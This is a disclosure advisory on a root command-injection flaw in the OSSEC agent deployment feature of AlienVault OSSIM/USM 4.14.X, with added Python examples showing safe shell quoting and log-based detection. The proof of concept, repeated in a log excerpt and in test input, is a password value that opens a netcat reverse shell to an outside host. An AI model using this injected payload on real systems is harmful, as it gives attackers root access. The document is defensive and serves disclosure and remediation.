Alienvault OSSIM/USM 4.14.X Command Execution

Published 16 Jan 2015 00:00:00. Reported by Peter Lapp. Type: packetstorm. Source: packetstormsecurity.com

Command execution vulnerability in Alienvault OSSIM/USM 4.14.X: a user authenticated to the web UI can obtain root access on the OSSIM server through the automatic OSSEC agent deployment feature for Windows hosts.

Details  
=======  
  
Product: Alienvault OSSIM/USM  
Vulnerability: Command Execution  
Author: Peter Lapp, [email protected]  
CVE: None assigned  
Vulnerable Versions: <=4.14.X  
Fixed Version: 4.15.0  
  
  
Summary  
=======  
  
Alienvault OSSIM is an open source SIEM solution designed to collect  
and correlate log data. The automatic deployment option for OSSEC  
agents is vulnerable to command execution as root. Authentication to  
the web UI is required to exploit this vulnerability.  
  
  
  
Technical Details and POC  
=========================  
  
The web UI allows a user to automatically deploy OSSEC agents to  
Windows hosts when supplied with a username and password. The username  
and password are passed unfiltered to a command that runs as root. By  
simply providing a password of "fakepass | nc -c /bin/sh X.X.X.X 1234  
| " a reverse shell is created and root access to the operating system  
is obtained.  
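The injection works because the supplied password is interpolated into a string that bash parses (the Ansible task runs with `shell=True`), so the `|` in the password terminates the `winexe` command and starts a new pipeline stage. The following added example, which is not AlienVault or OSSIM code, contrasts that construction with two hardened forms: shell-quoting each value when a shell is unavoidable, and passing an argv list with no shell at all. The helper names and the `winexe` argument layout are assumptions modelled on the command visible in the `user.log` excerpt below.

```python
import shlex
from typing import List

# Added example, not AlienVault/OSSIM code. Helper names and the winexe
# argument layout are assumptions modelled on the advisory's user.log line.

WINEXE_REMOTE_CMD = "cmd /c set"


def build_winexe_unsafe(user: str, password: str, host: str) -> str:
    """Vulnerable pattern: credentials interpolated into a string that a shell
    (bash via Ansible shell=True) will parse. Shell metacharacters in the
    password become part of the command line."""
    return f"winexe --user=/{user}%{password} //{host} '{WINEXE_REMOTE_CMD}'"


def build_winexe_quoted(user: str, password: str, host: str) -> str:
    """Hardened form for when a shell is unavoidable: every value is quoted
    with shlex.quote, so bash sees exactly one word per value even if the
    password contains '|', ';', '$(' or backticks."""
    parts = ["winexe", f"--user=/{user}%{password}", f"//{host}", WINEXE_REMOTE_CMD]
    return " ".join(shlex.quote(p) for p in parts)


def build_winexe_argv(user: str, password: str, host: str) -> List[str]:
    """Preferred form: an argv list for subprocess.run(argv, shell=False).
    No shell parses the values, so there is nothing to inject into."""
    return ["winexe", f"--user=/{user}%{password}", f"//{host}", WINEXE_REMOTE_CMD]


def shell_words(command_line: str) -> List[str]:
    """The words a POSIX shell would pass to the program (quoting honoured)."""
    return shlex.split(command_line)


def pipeline_stages(command_line: str) -> int:
    """Number of commands bash would run for this line: 1 plus the number of
    unquoted '|' tokens. shlex with punctuation_chars honours quoting, so a
    '|' inside a quoted word is not counted."""
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    tokens = list(lex)
    return tokens.count("|") + 1


if __name__ == "__main__":
    # Constructed input reproducing the password from the advisory.
    user, host = "test", "10.10.10.199"
    password = "fakepass | nc -c /bin/sh 10.10.10.10 1234 |"

    unsafe = build_winexe_unsafe(user, password, host)
    quoted = build_winexe_quoted(user, password, host)
    print("unsafe pipeline stages:", pipeline_stages(unsafe))  # 3: winexe, nc, //host
    print("quoted pipeline stages:", pipeline_stages(quoted))  # 1
    print("argv:", build_winexe_argv(user, password, host))
```

With the unsafe builder the one password value becomes three shell commands; with the quoted builder bash hands `winexe` the same four words the argv list contains, and the password, metacharacters included, stays inside the `--user=` argument where it simply fails to authenticate.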
  
The user.log shows the input as it is passed to the command:  
  
Dec 18 16:42:28 ossim-server ansible-command: Invoked with  
executable=/bin/bash shell=True args= program_files_x86=$(winexe  
--user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 |  
//10.10.10.199 'cmd /c set' | grep "^ProgramFiles(x86)=" | cut -d'='  
-f 2-); program_files_x64=$(winexe --user=/test%fakepass | nc -c  
/bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep  
"^ProgramFiles=" | cut -d'=' -f 2-); [[ $program_files_x86 ]] && echo  
$program_files_x86 || echo $program_files_x64 removes=None  
creates=None chdir=None  
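Because the deployment command is recorded in `user.log` with the credentials inline, the log is also where an administrator can spot abuse of this feature on unpatched hosts. The added example below, which is not OSSIM code, scans constructed `ansible-command` lines modelled on the excerpt above (joined onto a single line each) and flags any `winexe --user=` credential whose password part contains shell metacharacters. The regexes and the metacharacter list are assumptions; the benign second line is constructed for contrast.

```python
import re
from typing import Dict, List

# Added example, not OSSIM code. The regexes and metacharacter list are
# assumptions; the log lines are constructed from the advisory's excerpt.

# Constructed sample of /var/log/user.log: the injected deployment from the
# advisory (joined onto one line), a benign deployment, and an unrelated line.
SAMPLE_USER_LOG = [
    "Dec 18 16:42:28 ossim-server ansible-command: Invoked with executable=/bin/bash "
    "shell=True args= program_files_x86=$(winexe --user=/test%fakepass | nc -c /bin/sh "
    "10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep \"^ProgramFiles(x86)=\" | "
    "cut -d'=' -f 2-); removes=None creates=None chdir=None",
    "Dec 18 16:50:03 ossim-server ansible-command: Invoked with executable=/bin/bash "
    "shell=True args= program_files_x86=$(winexe --user=/deploy%Winter2014 //10.10.10.200 "
    "'cmd /c set' | grep \"^ProgramFiles(x86)=\" | cut -d'=' -f 2-); "
    "removes=None creates=None chdir=None",
    "Dec 18 16:51:10 ossim-server sshd[2201]: Accepted publickey for root from 10.10.10.5",
]

ANSIBLE_CMD = re.compile(r"ansible-command: Invoked with .*?args=(?P<args>.*)")
# A legitimate credential runs without whitespace up to the //host target, so
# capture everything between '%' and the next '//' and inspect it.
WINEXE_CRED = re.compile(r"--user=(?P<user>[^%\s]*)%(?P<password>.*?)\s*//(?P<host>\S+)")
# Characters that would let the password escape the winexe command under bash.
SHELL_META = re.compile(r"[|;&`]|\$\(")


def find_suspicious_deployments(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per ansible-command line whose winexe password part
    carries shell metacharacters."""
    findings = []
    for line in lines:
        m = ANSIBLE_CMD.search(line)
        if not m:
            continue  # not an Ansible command record
        for cred in WINEXE_CRED.finditer(m.group("args")):
            pw = cred.group("password")
            if SHELL_META.search(pw):
                findings.append({
                    "timestamp": line[:15],
                    "target_host": cred.group("host"),
                    "user": cred.group("user"),
                    "password_fragment": pw[:40],  # enough to triage, not the full value
                })
                break  # one finding per log line is enough
    return findings


if __name__ == "__main__":
    for f in find_suspicious_deployments(SAMPLE_USER_LOG):
        print(f)
```

Only the injected line is reported; the benign deployment and the unrelated sshd record are skipped. The same excerpt shows that the feature writes the Windows deployment credentials to `user.log` in clear text, so the log file itself deserves restricted permissions and careful retention.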
  
  
  
Solution  
========  
  
Upgrade to v4.15.0.  
  
  
  
References  
==========  
  
https://www.alienvault.com/forums/discussion/4414/alienvault-v4-15-functional-release  
(ENG-98338)  
  
  
  
Timeline  
========  
12/18/14 - Reported the vulnerability to the vendor and received  
confirmation that a defect was filed.  
01/14/15 - Vendor confirmed the issue was fixed and patch available.  
01/15/15 - Confirmed vulnerability was no longer exploitable and released info.  
